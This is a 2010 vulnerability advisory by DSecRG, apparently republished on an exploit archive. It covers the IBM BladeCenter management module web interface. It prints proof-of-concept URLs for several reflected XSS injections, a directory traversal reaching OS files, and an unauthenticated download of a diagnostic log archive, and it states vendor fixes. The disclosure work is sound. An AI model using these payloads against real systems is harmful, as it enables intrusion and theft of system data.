IBM Bladecenter Management - Multiple vulnerabilities

2010-07-06T00:00:00
ID 1337DAY-ID-13165
Type zdt
Reporter Alexey Sintsov
Modified 2010-07-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
IBM Bladecenter Management - Multiple vulnerabilities
=====================================================


Application: IBM BladeCenter Managemet Module
Versions Affected: BPET48L and may be other versions
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: XSS,Directory traversal, Information disclosure
Exploits: YES
Reported: 05.09.2009
Vendor response: 09.09.2009
Solution: YES
Date of Public Advisory: 05.07.2010
Author: Sintsov Alexey
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
 
 
Description
***********
 
The BladeCenter management module is prone to multiple security vulnerabilities:
 
1 Dinamic XSS
2 Directory Listing
3 Unauthorized Access
 
Details
*******
1. Multiple XSS vulnerabilities found in bladecenter web management
 
 
Examples
*******
 
http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert(\'XSS1\');%3C/script%3E&VLANID=&IPADDR=3>%3Cscript%3Ealert(\'XSS2\');%3C/script%3E
http://[BLADECENTER]/private/power_management_policy_options.php?domain=3<XSS>
 
http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS>
 
http://[BLADECENTER]/private/power_module.php?view=4&mod_type=4&slot=3<XSS>
http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS>
http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3<XSS>
 
http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3<XSS>&save=1
 
 
2. Directory Listing vulnerability found in bladecenter web management
 
Attacker need to be authorized.
 
Examples
*******
 
http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc
 
 
Attacker can get full access to OS files.
 
 
3. UNauthorized access
 
Access to the sensitive data (system logs, cores) can be done by requesting a file:
 
Examples
*******
http://[BLADECENTER]/private/sdc.tgz
 
 
Solution
********
 
All three issues were fixed in the v4.7 and v5.0



#  0day.today [2018-04-13]  #